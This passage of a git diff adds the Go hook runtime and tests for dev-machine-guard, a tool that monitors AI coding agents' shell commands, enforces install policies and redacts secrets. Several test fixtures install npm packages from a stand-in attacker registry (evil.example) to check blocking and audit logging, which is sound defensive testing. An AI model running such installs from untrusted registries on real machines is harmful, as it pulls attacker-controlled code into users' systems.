invoked hook + // is authoritative, block-mode policy should evaluate and block. + payload := `{"hook_event_name":"PostToolUse","tool_name":"Bash","tool_input":{"command":"npm install --registry=https://evil.example/ lodash"}}` + resp, ev := runWithPolicy(t, payload, event.HookPreToolUse, blockModePolicy()) + + expectBlockResponse(t, resp) + pd := ev.PolicyDecision + if pd == nil || !pd.Enforced || pd.Allowed { + t.Errorf("expected enforced policy decision, got %+v", pd) + } + // Mismatch annotation must be present in errors. + found := false + for _, e := range ev.Errors { + if e.Code == "hook_event_name_mismatch" { + found = true + break + } + } + if !found { + t.Errorf("expected hook_event_name_mismatch error annotation, got errors=%+v", ev.Errors) + } +} + +// Audit-mode findings keep their detail in internal_detail (the audit +// channel) but the user-facing wire response never names the registry. +func TestAuditFindingDetailGoesToTelemetryNotWire(t *testing.T) { + resp, ev := runWith(t, `{"tool_name":"Bash","tool_input":{"command":"npm install --registry=https://evil.example/ lodash"}}`, event.HookPreToolUse) + + expectAllowResponse(t, resp) + + // Wire response is allow with no detail. + if _, ok := resp["hookSpecificOutput"]; ok { + t.Errorf("allow response must not carry hookSpecificOutput, got %v", resp) + } + + pd := ev.PolicyDecision + if pd == nil || !strings.Contains(pd.InternalDetail, "evil.example") { + t.Errorf("internal_detail must record the violating registry for audit: %+v", pd) + } +} diff --git a/internal/aiagents/hook/runtime.go b/internal/aiagents/hook/runtime.go new file mode 100644 index 0000000..47120da --- /dev/null +++ b/internal/aiagents/hook/runtime.go @@ -0,0 +1,361 @@ +// Package hook implements the bounded, fail-open hot path invoked by +// `stepsecurity-dev-machine-guard _hook `. Every stage +// MUST be capped, redaction-first, and resilient to internal errors: +// the agent waits for stdout, so a failure here can never become a +// non-zero exit or a stalled response. +// +// Persistence-by-design omission: this package does NOT write +// events.jsonl. The only on-disk artifact is the errors log appended +// through the LogError seam; the event itself is either delivered to +// UploadEvent or dropped. +package hook + +import ( + "context" + "encoding/json" + "errors" + "io" + "os" + "strings" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/enrich/mcp" + "github.com/step-security/dev-machine-guard/internal/aiagents/enrich/npm" + "github.com/step-security/dev-machine-guard/internal/aiagents/enrich/secrets" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/identity" + "github.com/step-security/dev-machine-guard/internal/aiagents/ingest" + "github.com/step-security/dev-machine-guard/internal/aiagents/policy" + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// Every hook invocation MUST honor these caps. +// +// CapHook bounds the worst-case agent stall on a hung invocation. It is +// 15s to absorb the 1s identity probe and a +// 5s upload under load. The agent's own hook timeout (Claude Code +// defaults to 60s) is the absolute ceiling above us. +const ( + CapHook = 15 * time.Second + CapPM = 10 * time.Second + CapMCP = 10 * time.Second + CapSecretMin = 30 * time.Second + CapSecretMax = 60 * time.Second + MaxStdinBytes = 5 * 1024 * 1024 // 5 MiB +) + +// UploadTimeout is the per-invocation cap on the synchronous upload +// stage. Mirrors ingest.DefaultHookUploadTimeout; kept here so the +// runtime stays decoupled from the ingest package's HTTP client. +const UploadTimeout = 5 * time.Second + +// Runtime wires every dependency the hot path needs. +// +// All fields are exported so tests and the CLI handler can construct a +// Runtime by struct literal. Production code prefers NewRuntime, which +// fills in defaults (real executor, os.Std{in,out,err}, UTC clock). +type Runtime struct { + Adapter adapter.Adapter + Exec executor.Executor + Stdin io.Reader + Stdout io.Writer + Stderr io.Writer + Now func() time.Time + + // Policy, when non-nil, overrides the embedded builtin. Production + // code leaves this nil; tests inject mode/allowlist variants. + Policy *policy.Policy + + // UploadEvent is the synchronous backend ingestion seam. nil means + // upload is disabled — the local-only behavior the runtime falls + // back to whenever enterprise config is missing. Production wires + // this to an ingest.Client closure via cli.newUploader; tests + // inject a capture function. The event passed in already carries + // customer_id, device_id, and user_identity stamped from the same + // identity.Resolve call, so the seam intentionally does not take a + // separate identity argument. + UploadEvent func(ctx context.Context, ev event.Event) error + + // LogError is the errors.jsonl appender seam. nil means errors are + // silently dropped — fail-open is the contract; logging is best + // effort. Production wires this to cli.AppendError; tests can + // capture the calls by setting their own function. Signature + // matches cli.AppendError(stage, code, message, eventID). + LogError func(stage, code, message, eventID string) +} + +// NewRuntime constructs the default runtime for the given adapter. The +// hook package no longer knows about any concrete adapter; agent +// selection is the CLI's job. +func NewRuntime(a adapter.Adapter) *Runtime { + return &Runtime{ + Adapter: a, + Exec: executor.NewReal(), + Stdin: os.Stdin, + Stdout: os.Stdout, + Stderr: os.Stderr, + Now: func() time.Time { return time.Now().UTC() }, + } +} + +// Run executes one hook invocation. It always writes an adapter-compatible +// response to stdout, even on internal failure. The default verdict is +// allow; only an explicit policy match flips it to block. +// +// The returned error, if any, is purely informational for the CLI exit +// path: the CLI swallows it so the process exit code stays 0. +func (rt *Runtime) Run(parent context.Context, hookType event.HookEvent) error { + ctx, cancel := context.WithTimeout(parent, CapHook) + defer cancel() + + // The deferred emit reads these captured variables. Defaults: allow + // decision, no parsed event (the parse may fail before `ev` is set). + // The policy stage is the only thing that overwrites `decision`. Any + // failure path leaves it at allow, preserving fail-open. The closure + // reads both at deferred-execution time, so later assignments to `ev` + // and `decision` are visible. + decision := adapter.AllowDecision() + var ev *event.Event + defer func() { rt.emitDecidedResponse(ev, decision) }() + + cfg, _ := ingest.Snapshot() + id := identity.Resolve(ctx, rt.Exec, cfg.CustomerID) + upload := rt.resolveUpload() + + raw, readErr := readBounded(rt.Stdin, MaxStdinBytes) + if readErr != nil { + if errors.Is(readErr, errInputTooLarge) { + rt.logError("stdin", "input_too_large", readErr.Error(), "") + return readErr + } + rt.logError("stdin", "read_error", readErr.Error(), "") + return readErr + } + + parsed, parseErr := rt.Adapter.ParseEvent(ctx, hookType, raw) + if parseErr != nil { + rt.logError("parse", "parse_error", parseErr.Error(), "") + return parseErr + } + ev = parsed + + // Stamp identity. AgentVersion is intentionally not stamped here — + // it would have to come from the adapter or hook payload, and Claude + // Code does not include it in the hook payload today. The field stays + // empty until there is a real source. + ev.CustomerID = id.CustomerID + ev.UserIdentity = id.UserIdentity + ev.DeviceID = id.DeviceID + + // Classify before enrichment so even fast paths get the bool flags. + classify(ev) + + // From here on, ev.HookEvent is the source of truth. ParseEvent keeps it + // aligned with the CLI hook arg and records any payload hook_event_name + // mismatch in ev.Errors, so policy evaluation and response rendering use + // the same hook type. + + // Extract the shell command once. The adapter owns shell extraction; + // the runtime hands the redacted command to enrichments and policy. + shellCmd, shellCwd, hasShell := rt.Adapter.ShellCommand(ev) + + // Run enrichments under their own caps. + rt.runEnrichments(ctx, ev, shellCmd, shellCwd, hasShell) + + // Policy evaluation. Fail-open: only an explicit block decision + // overwrites `decision`; every error path inside leaves the default + // allow in place. Phase-based gate keeps cross-agent correctness: + // pre_tool + command_exec + a shell command in hand. + if shouldEvaluatePolicy(ev, shellCmd) { + if info, d := rt.evaluatePolicy(ctx, ev, shellCmd); info != nil { + ev.PolicyDecision = info + if !d.Allow { + decision = d + } + } + } + + // Re-redact final event (defense in depth) before upload. + if ev.Payload != nil { + if m, ok := redact.Value(ev.Payload).(map[string]any); ok { + ev.Payload = m + } + } + + // Synchronous upload, fail-open. The agent response has not been + // emitted yet — the deferred emit fires after Run returns — so any + // time spent here directly delays the agent. The upload context is + // capped at UploadTimeout to bound that delay even when the backend + // hangs. + // + // Failure is recorded only in errors.jsonl; the event is dropped. + if upload != nil { + uploadCtx, cancel := context.WithTimeout(ctx, UploadTimeout) + uploadErr := upload(uploadCtx, *ev) + cancel() + if uploadErr != nil { + rt.logError("ingest", "upload_error", uploadErr.Error(), ev.EventID) + } + } + return nil +} + +// resolveUpload picks the upload function for this hook invocation. +// Tests override Runtime.UploadEvent directly; production code wires +// it through cli.newUploader, which returns nil whenever enterprise +// config is missing. A nil UploadEvent disables upload — the +// local-only fallback we want without enterprise credentials. +func (rt *Runtime) resolveUpload() func(context.Context, event.Event) error { + return rt.UploadEvent +} + +// emitDecidedResponse writes the adapter's wire-format response for the +// final decision. Both ev and dec are captured by the deferred closure +// in Run so the values reflect whatever the runtime had reached when +// it returned. ev is nil on parse-error paths; the adapter handles that +// as allow. +// +// Errors marshaling are intentionally swallowed; both Claude Code and +// Codex accept an empty body as "allow", so we always succeed at fail-open. +func (rt *Runtime) emitDecidedResponse(ev *event.Event, dec adapter.Decision) { + resp := rt.Adapter.DecideResponse(ev, dec) + b, err := json.Marshal(resp) + if err != nil { + _, _ = io.WriteString(rt.Stdout, "{}\n") + return + } + _, _ = rt.Stdout.Write(b) + _, _ = io.WriteString(rt.Stdout, "\n") +} + +// logError forwards to the LogError seam. nil seam means errors are +// silently dropped, preserving the fail-open contract end-to-end. +func (rt *Runtime) logError(stage, code, message, eventID string) { + if rt.LogError == nil { + return + } + rt.LogError(stage, code, message, eventID) +} + +func classify(ev *event.Event) { + cls := event.Classifications{} + switch ev.ActionType { + case event.ActionCommandExec: + cls.IsShellCommand = true + case event.ActionFileRead, event.ActionFileWrite, event.ActionFileDelete: + cls.IsFileOperation = true + case event.ActionNetworkRequest: + cls.IsNetworkActivity = true + case event.ActionMCPInvocation: + cls.IsMCPRelated = true + } + // Lifecycle MCP signals: phase alone (or tool_name prefix on + // permission phases) is enough to set the broad filter, no enrichment + // block required. Branching on HookPhase rather than the native + // HookEvent keeps this correct for any future adapter whose native + // hook names differ from Claude's. + switch ev.HookPhase { + case event.HookPhaseElicitation, event.HookPhaseElicitationResult: + cls.IsMCPRelated = true + case event.HookPhasePermissionRequest, event.HookPhasePermissionDenied: + if strings.HasPrefix(strings.ToLower(ev.ToolName), "mcp__") { + cls.IsMCPRelated = true + } + } + if !cls.IsZero() { + ev.Classifications = &cls + } +} + +func (rt *Runtime) runEnrichments(parent context.Context, ev *event.Event, cmd, cwd string, hasShell bool) { + // Shell command capture + package-manager enrichment. + if hasShell { + ev.Enrichments = ensureEnrich(ev.Enrichments) + ev.Enrichments.Shell = &event.ShellEnrichment{ + Command: truncate(redact.String(cmd), 4096), + CommandTruncated: len(cmd) > 4096, + WorkingDirectory: cwd, + } + // Package manager + pmCtx, cancel := context.WithTimeout(parent, CapPM) + started := time.Now() + pmInfo, pmTimedOut := npm.Enrich(pmCtx, cmd, cwd) + cancel() + if pmInfo != nil { + ev.Enrichments.PackageManager = pmInfo + if ev.Classifications == nil { + ev.Classifications = &event.Classifications{} + } + ev.Classifications.IsPackageManager = pmInfo.Detected + } + if pmTimedOut { + ev.Timeouts = append(ev.Timeouts, event.TimeoutInfo{ + Stage: "package_manager", Cap: CapPM, Elapsed: time.Since(started), + }) + rt.logError("enrich_pm", "enrichment_timeout", "package manager enrichment exceeded cap", "") + } + + // MCP from shell evidence: only emitted when parsing the + // command actually surfaces a server. Direct mcp____ + // tool events, MCP permission events, and Elicitation hooks + // produce no MCPInfo block — their server identity is already + // in tool_name or the payload. classify() sets is_mcp_related + // for those cases from the hook event alone. + mcpCtx, cancelMCP := context.WithTimeout(parent, CapMCP) + startedMCP := time.Now() + mcpInfo, mcpTimedOut := mcp.ClassifyShell(mcpCtx, cmd) + cancelMCP() + if mcpInfo != nil { + ev.Enrichments.MCP = mcpInfo + if ev.Classifications == nil { + ev.Classifications = &event.Classifications{} + } + ev.Classifications.IsMCPRelated = true + } + if mcpTimedOut { + ev.Timeouts = append(ev.Timeouts, event.TimeoutInfo{ + Stage: "mcp", Cap: CapMCP, Elapsed: time.Since(startedMCP), + }) + rt.logError("enrich_mcp", "enrichment_timeout", "mcp enrichment exceeded cap", "") + } + } + + // Session-end secret scanner. Bounded and runs only when a transcript + // path is present in the payload. Phase-keyed so any adapter mapping + // its session-end equivalent to HookPhaseSessionEnd gets the scan. + if ev.HookPhase == event.HookPhaseSessionEnd { + transcript, _ := ev.Payload["transcript_path"].(string) + if transcript != "" { + scanCtx, cancel := context.WithTimeout(parent, CapSecretMin) + started := time.Now() + info, timedOut := secrets.ScanTranscript(scanCtx, transcript) + cancel() + if info != nil { + ev.Enrichments = ensureEnrich(ev.Enrichments) + ev.Enrichments.Secrets = info + } + if timedOut { + ev.Timeouts = append(ev.Timeouts, event.TimeoutInfo{ + Stage: "secret_scan", Cap: CapSecretMin, Elapsed: time.Since(started), + }) + rt.logError("enrich_secrets", "enrichment_timeout", "secret scan exceeded cap", "") + } + } + } +} + +func ensureEnrich(e *event.Enrichments) *event.Enrichments { + if e != nil { + return e + } + return &event.Enrichments{} +} + +func truncate(s string, n int) string { + if len(s) <= n { + return s + } + return s[:n] +} diff --git a/internal/aiagents/hook/runtime_test.go b/internal/aiagents/hook/runtime_test.go new file mode 100644 index 0000000..52db61d --- /dev/null +++ b/internal/aiagents/hook/runtime_test.go @@ -0,0 +1,420 @@ +package hook + +import ( + "bytes" + "context" + "encoding/json" + "errors" + "io" + "strings" + "sync" + "testing" + "time" + + cc "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/claudecode" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// captured holds the events the runtime hands to UploadEvent during a +// test. UploadEvent is the single test seam for inspecting the +// constructed event. +type captured struct { + mu sync.Mutex + events []event.Event + errs []errLogEntry +} + +type errLogEntry struct { + Stage, Code, Message, EventID string +} + +func (c *captured) capture() func(context.Context, event.Event) error { + return func(_ context.Context, ev event.Event) error { + c.mu.Lock() + defer c.mu.Unlock() + c.events = append(c.events, ev) + return nil + } +} + +func (c *captured) logError() func(stage, code, message, eventID string) { + return func(stage, code, message, eventID string) { + c.mu.Lock() + defer c.mu.Unlock() + c.errs = append(c.errs, errLogEntry{stage, code, message, eventID}) + } +} + +func newRuntime(t *testing.T, stdin io.Reader, stdout, stderr io.Writer) (*Runtime, *captured) { + t.Helper() + cap := &captured{} + rt := &Runtime{ + Adapter: cc.New(t.TempDir(), "/usr/local/bin/stepsecurity-dev-machine-guard"), + Exec: executor.NewMock(), + Stdin: stdin, + Stdout: stdout, + Stderr: stderr, + Now: func() time.Time { return time.Now().UTC() }, + UploadEvent: cap.capture(), + LogError: cap.logError(), + } + return rt, cap +} + +func TestRunHappyPathBashHook(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"abc", + "cwd":"/tmp/work", + "tool_name":"Bash", + "tool_input":{"command":"npm install lodash","cwd":"/tmp/work"} + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + + if err := rt.Run(context.Background(), event.HookPreToolUse); err != nil { + t.Fatalf("Run: %v", err) + } + // stdout MUST be a Claude-compatible allow response. + var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(stdout.Bytes()), &resp); err != nil { + t.Fatalf("stdout not JSON: %v: %q", err, stdout.Bytes()) + } + if resp["continue"] != true { + t.Errorf("expected continue=true, got %v", resp["continue"]) + } + + if len(cap.events) != 1 { + t.Fatalf("expected 1 uploaded event, got %d", len(cap.events)) + } + ev := cap.events[0] + if ev.HookEvent != event.HookPreToolUse { + t.Errorf("hook_event: %v", ev.HookEvent) + } + if ev.ActionType != event.ActionCommandExec { + t.Errorf("action_type: %v", ev.ActionType) + } + if ev.Classifications == nil || !ev.Classifications.IsShellCommand { + t.Errorf("expected is_shell_command classification: %+v", ev.Classifications) + } + if !ev.Classifications.IsPackageManager { + t.Errorf("expected is_package_manager classification: %+v", ev.Classifications) + } +} + +func TestRunMalformedPayloadReturnsAllow(t *testing.T) { + stdin := strings.NewReader(`{not valid json`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + + err := rt.Run(context.Background(), event.HookPreToolUse) + if err == nil { + t.Fatal("expected internal error on parse failure") + } + // Even on parse failure stdout must still be the allow response. + var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(stdout.Bytes()), &resp); err != nil { + t.Fatalf("stdout not JSON: %v: %q", err, stdout.Bytes()) + } + if resp["continue"] != true { + t.Errorf("expected continue=true even on parse failure, got %v", resp) + } + // No event uploaded when ParseEvent fails — the runtime drops the + // event and only logs the error to errors.jsonl. + if len(cap.events) != 0 { + t.Errorf("expected no upload on parse failure, got %d", len(cap.events)) + } + // The error must surface through the logger seam. + found := false + for _, e := range cap.errs { + if e.Stage == "parse" && e.Code == "parse_error" { + found = true + break + } + } + if !found { + t.Errorf("expected parse_error in error log, got %+v", cap.errs) + } +} + +func TestRunInputTooLargeReturnsAllow(t *testing.T) { + big := bytes.Repeat([]byte("a"), int(MaxStdinBytes)+10) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, bytes.NewReader(big), &stdout, &stderr) + + err := rt.Run(context.Background(), event.HookPreToolUse) + if !errors.Is(err, errInputTooLarge) { + t.Fatalf("expected errInputTooLarge, got %v", err) + } + if !strings.HasPrefix(strings.TrimSpace(stdout.String()), "{") { + t.Errorf("stdout should be JSON allow response: %q", stdout.String()) + } + // Oversize payload short-circuits before parse → no upload, errlog hit. + if len(cap.events) != 0 { + t.Errorf("expected no upload on input_too_large, got %d", len(cap.events)) + } + found := false + for _, e := range cap.errs { + if e.Stage == "stdin" && e.Code == "input_too_large" { + found = true + break + } + } + if !found { + t.Errorf("expected input_too_large in error log, got %+v", cap.errs) + } +} + +// Direct mcp__ tool invocation flows through PreToolUse with +// action_type:"mcp_invocation" and is_mcp_related:true. No +// enrichments.mcp block — the server identity already lives in +// tool_name; backends split it at query time. +func TestRunMCPDirectToolInvocation(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"mcp__github__search", + "tool_input":{"query":"hi"} + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + if err := rt.Run(context.Background(), event.HookPreToolUse); err != nil { + t.Fatal(err) + } + if len(cap.events) != 1 { + t.Fatalf("expected 1 event, got %d", len(cap.events)) + } + ev := cap.events[0] + if ev.ActionType != event.ActionMCPInvocation { + t.Errorf("action_type: %v", ev.ActionType) + } + if ev.Classifications == nil || !ev.Classifications.IsMCPRelated { + t.Errorf("expected is_mcp_related: %+v", ev.Classifications) + } + if ev.Enrichments != nil && ev.Enrichments.MCP != nil { + t.Errorf("direct mcp__ tool calls must NOT carry enrichments.mcp: %+v", ev.Enrichments) + } +} + +// Shell-launched MCP keeps its shell context AND gets MCP enrichment. +// Both classifications must be set; the original shell command is +// preserved in enrichments.shell.command. +func TestRunMCPShellLaunchedKeepsShellContext(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"npx -y @modelcontextprotocol/server-filesystem /tmp"} + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + if err := rt.Run(context.Background(), event.HookPreToolUse); err != nil { + t.Fatal(err) + } + ev := cap.events[0] + if ev.ActionType != event.ActionCommandExec { + t.Errorf("action_type: %v", ev.ActionType) + } + if ev.Classifications == nil || !ev.Classifications.IsShellCommand || !ev.Classifications.IsMCPRelated { + t.Errorf("expected both shell+mcp classifications: %+v", ev.Classifications) + } + if ev.Enrichments == nil || ev.Enrichments.Shell == nil || ev.Enrichments.Shell.Command == "" { + t.Errorf("shell enrichment missing: %+v", ev.Enrichments) + } + mcp := ev.Enrichments.MCP + if mcp == nil || mcp.ServerName != "server-filesystem" || mcp.Kind != "local" { + t.Errorf("mcp enrichment: %+v", mcp) + } + if mcp.ServerCommand == "" { + t.Errorf("expected redacted server_command in mcp enrichment: %+v", mcp) + } +} + +// PermissionRequest / PermissionDenied carrying an mcp____ +// tool_name must be flagged is_mcp_related so the audit pipeline +// captures permission prompts and auto-denials around MCP servers. +// They are not tool calls themselves, so action_type stays empty, and +// no enrichments.mcp block is emitted — server identity is already in +// tool_name. +func TestRunMCPPermissionEventClassifiedFromToolName(t *testing.T) { + for _, ht := range []event.HookEvent{event.HookPermissionRequest, event.HookPermissionDenied} { + t.Run(string(ht), func(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"mcp__github__search", + "tool_input":{"query":"hi"} + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + if err := rt.Run(context.Background(), ht); err != nil { + t.Fatal(err) + } + ev := cap.events[0] + if ev.ActionType != "" { + t.Errorf("%s must omit action_type: %v", ht, ev.ActionType) + } + if ev.Classifications == nil || !ev.Classifications.IsMCPRelated { + t.Errorf("expected is_mcp_related: %+v", ev.Classifications) + } + if ev.Enrichments != nil && ev.Enrichments.MCP != nil { + t.Errorf("permission events must NOT carry enrichments.mcp: %+v", ev.Enrichments) + } + }) + } +} + +// Permission events for non-MCP tools must NOT set is_mcp_related. +func TestRunPermissionEventNonMCPNotFlagged(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"s", + "cwd":"/tmp", + "tool_name":"Bash", + "tool_input":{"command":"ls"} + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + if err := rt.Run(context.Background(), event.HookPermissionRequest); err != nil { + t.Fatal(err) + } + ev := cap.events[0] + if ev.Classifications != nil && ev.Classifications.IsMCPRelated { + t.Errorf("Bash permission events must not be flagged MCP: %+v", ev.Classifications) + } +} + +// Elicitation hooks are inherently MCP. is_mcp_related is set from the +// hook event itself; no enrichments.mcp block is emitted — the payload +// already carries mcp_server_name. +func TestRunMCPElicitationFlaggedFromHookEvent(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"s", + "cwd":"/tmp", + "mcp_server_name":"github", + "message":"approve" + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + if err := rt.Run(context.Background(), event.HookElicitation); err != nil { + t.Fatal(err) + } + ev := cap.events[0] + if ev.ActionType != "" { + t.Errorf("Elicitation must omit action_type: %v", ev.ActionType) + } + if ev.Classifications == nil || !ev.Classifications.IsMCPRelated { + t.Errorf("expected is_mcp_related from hook event: %+v", ev.Classifications) + } + if ev.Enrichments != nil && ev.Enrichments.MCP != nil { + t.Errorf("elicitation events must NOT carry enrichments.mcp: %+v", ev.Enrichments) + } + if ev.Payload["mcp_server_name"] != "github" { + t.Errorf("payload should preserve mcp_server_name: %v", ev.Payload) + } +} + +// Elicitation URLs go through the redactor only; user:pass@host +// userinfo and ?token= query params must be scrubbed in payload.url. +func TestRunMCPElicitationURLRedacted(t *testing.T) { + stdin := strings.NewReader(`{ + "mcp_server_name":"github", + "url":"https://user:secret@mcp.example.com:8443/auth?token=zzz" + }`) + var stdout, stderr bytes.Buffer + rt, cap := newRuntime(t, stdin, &stdout, &stderr) + if err := rt.Run(context.Background(), event.HookElicitation); err != nil { + t.Fatal(err) + } + ev := cap.events[0] + url, _ := ev.Payload["url"].(string) + if strings.Contains(url, "secret") || strings.Contains(url, "user:") { + t.Errorf("userinfo leaked into payload.url: %q", url) + } + if strings.Contains(url, "token=zzz") { + t.Errorf("query token leaked into payload.url: %q", url) + } + if !strings.Contains(url, "mcp.example.com:8443") { + t.Errorf("host should be preserved: %q", url) + } +} + +// Upload failure must be silently absorbed: the agent still gets the +// allow response; the upload error is recorded in the error log +// without leaking sensitive material from the message. +func TestRunUploadFailureFailsOpen(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"abc", + "cwd":"/tmp/work", + "tool_name":"Bash", + "tool_input":{"command":"ls"} + }`) + var stdout, stderr bytes.Buffer + cap := &captured{} + rt := &Runtime{ + Adapter: cc.New(t.TempDir(), "/usr/local/bin/stepsecurity-dev-machine-guard"), + Exec: executor.NewMock(), + Stdin: stdin, + Stdout: &stdout, + Stderr: &stderr, + Now: func() time.Time { return time.Now().UTC() }, + LogError: cap.logError(), + } + uploadCalled := 0 + rt.UploadEvent = func(ctx context.Context, ev event.Event) error { + uploadCalled++ + return errors.New("backend down: connection refused") + } + + if err := rt.Run(context.Background(), event.HookPreToolUse); err != nil { + t.Fatalf("Run returned error on upload failure: %v", err) + } + if uploadCalled != 1 { + t.Errorf("UploadEvent called %d times, want 1", uploadCalled) + } + + // Agent response is still a valid allow. + var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(stdout.Bytes()), &resp); err != nil { + t.Fatalf("stdout not JSON: %v: %q", err, stdout.Bytes()) + } + if resp["continue"] != true { + t.Errorf("expected continue=true on upload failure, got %v", resp) + } + + // Error log must record the failure tagged with upload_error. + found := false + for _, e := range cap.errs { + if e.Stage == "ingest" && e.Code == "upload_error" { + found = true + break + } + } + if !found { + t.Errorf("expected upload_error in error log, got %+v", cap.errs) + } +} + +// When no UploadEvent is wired (any runtime without enterprise config), +// the runtime must still complete — just with no upload attempt. +func TestRunSkipsUploadWithoutSeam(t *testing.T) { + stdin := strings.NewReader(`{ + "session_id":"s","cwd":"/tmp","tool_name":"Bash","tool_input":{"command":"ls"} + }`) + var stdout, stderr bytes.Buffer + rt := &Runtime{ + Adapter: cc.New(t.TempDir(), "/usr/local/bin/stepsecurity-dev-machine-guard"), + Exec: executor.NewMock(), + Stdin: stdin, + Stdout: &stdout, + Stderr: &stderr, + Now: func() time.Time { return time.Now().UTC() }, + } + + if err := rt.Run(context.Background(), event.HookPreToolUse); err != nil { + t.Fatal(err) + } + // Stdout should still be the allow response. + if !strings.HasPrefix(strings.TrimSpace(stdout.String()), "{") { + t.Errorf("stdout should be JSON allow response: %q", stdout.String()) + } +} diff --git a/internal/aiagents/hook/stdin.go b/internal/aiagents/hook/stdin.go new file mode 100644 index 0000000..c32cb63 --- /dev/null +++ b/internal/aiagents/hook/stdin.go @@ -0,0 +1,26 @@ +package hook + +import ( + "errors" + "fmt" + "io" +) + +var errInputTooLarge = errors.New("input exceeds maximum allowed size") + +// readBounded reads up to max+1 bytes from r. If max is exceeded, returns +// errInputTooLarge along with whatever was read so far. +func readBounded(r io.Reader, max int64) ([]byte, error) { + if r == nil { + return nil, nil + } + limited := io.LimitReader(r, max+1) + buf, err := io.ReadAll(limited) + if err != nil { + return buf, fmt.Errorf("readBounded: %w", err) + } + if int64(len(buf)) > max { + return buf[:max], errInputTooLarge + } + return buf, nil +} diff --git a/internal/aiagents/identity/identity.go b/internal/aiagents/identity/identity.go new file mode 100644 index 0000000..8c46763 --- /dev/null +++ b/internal/aiagents/identity/identity.go @@ -0,0 +1,59 @@ +// Package identity computes AI-event identity for a hook invocation. +// +// This is a thin wrapper over DMG's `internal/device.Gather`. The only +// adapter logic that lives here is: +// +// 1. Bound the device probe with a 1-second context timeout. Hook +// invocations have a 15s total budget; identity must not be the +// thing that exhausts it. +// +// 2. Pass `"unknown"` through verbatim. device.Gather already returns +// that sentinel for failed probes; we do NOT rewrite it to "" — the +// backend distinguishes "not collected" from "actively unknown". +// +// 3. Single Gather call per Resolve — no probing twice for the two +// fields we need. +// +// CustomerID is plumbed through as-is from the caller (typically read +// from `internal/aiagents/ingest.Snapshot`); device.Gather has no +// awareness of it. +package identity + +import ( + "context" + "time" + + "github.com/step-security/dev-machine-guard/internal/device" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// ProbeTimeout is the upper bound on the device.Gather call. Tuned to +// leave room for enrichment + a 5s upload inside the 15s hook cap. +const ProbeTimeout = time.Second + +// Info is the identity payload attached to every AI-agent event. +// +// The wire field for DeviceID is `device_id`; the wire field for +// UserIdentity is `user_identity`. See internal/aiagents/event. +type Info struct { + CustomerID string + DeviceID string + UserIdentity string +} + +// Resolve returns identity information for the current host. +// +// On probe timeout or any executor error, fields fall back to the +// `"unknown"` sentinel that device.Gather emits internally — this +// function does not synthesize "" or any other replacement. +func Resolve(ctx context.Context, exec executor.Executor, customerID string) Info { + probeCtx, cancel := context.WithTimeout(ctx, ProbeTimeout) + defer cancel() + + d := device.Gather(probeCtx, exec) + return Info{ + CustomerID: customerID, + DeviceID: d.SerialNumber, + UserIdentity: d.UserIdentity, + } +} diff --git a/internal/aiagents/identity/identity_test.go b/internal/aiagents/identity/identity_test.go new file mode 100644 index 0000000..0094bfb --- /dev/null +++ b/internal/aiagents/identity/identity_test.go @@ -0,0 +1,180 @@ +package identity + +import ( + "context" + "sync/atomic" + "testing" + "time" + + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// hangingExec wraps a Mock and overrides Run to block until the supplied +// context is cancelled. Used to verify the 1s probe timeout actually fires +// instead of waiting forever for an unresponsive shell-out. +type hangingExec struct { + *executor.Mock + runCalls atomic.Int32 +} + +func (h *hangingExec) Run(ctx context.Context, _ string, _ ...string) (string, string, int, error) { + h.runCalls.Add(1) + <-ctx.Done() + return "", "", 124, ctx.Err() +} + +func (h *hangingExec) RunWithTimeout(ctx context.Context, _ time.Duration, name string, args ...string) (string, string, int, error) { + return h.Run(ctx, name, args...) +} + +func (h *hangingExec) RunInDir(ctx context.Context, _ string, _ time.Duration, name string, args ...string) (string, string, int, error) { + return h.Run(ctx, name, args...) +} + +// ReadFile must also fail or the Linux/Darwin fallbacks bypass the hang. +// Mock returns an error for unstubbed paths — that's the behavior we want. +// hangingExec inherits Mock's ReadFile, so no override needed. + +func TestResolve_HappyPath_Darwin(t *testing.T) { + mock := executor.NewMock() + mock.SetGOOS("darwin") + mock.SetCommand(`"IOPlatformSerialNumber" = "ABCXYZ123"`, "", 0, "ioreg", "-l") + mock.SetCommand("14.5\n", "", 0, "sw_vers", "-productVersion") + mock.SetEnv("USER_EMAIL", "subham@stepsecurity.io") + + got := Resolve(context.Background(), mock, "cust-42") + + if got.CustomerID != "cust-42" { + t.Errorf("CustomerID = %q, want cust-42", got.CustomerID) + } + if got.DeviceID != "ABCXYZ123" { + t.Errorf("DeviceID = %q, want ABCXYZ123 (from ioreg)", got.DeviceID) + } + if got.UserIdentity != 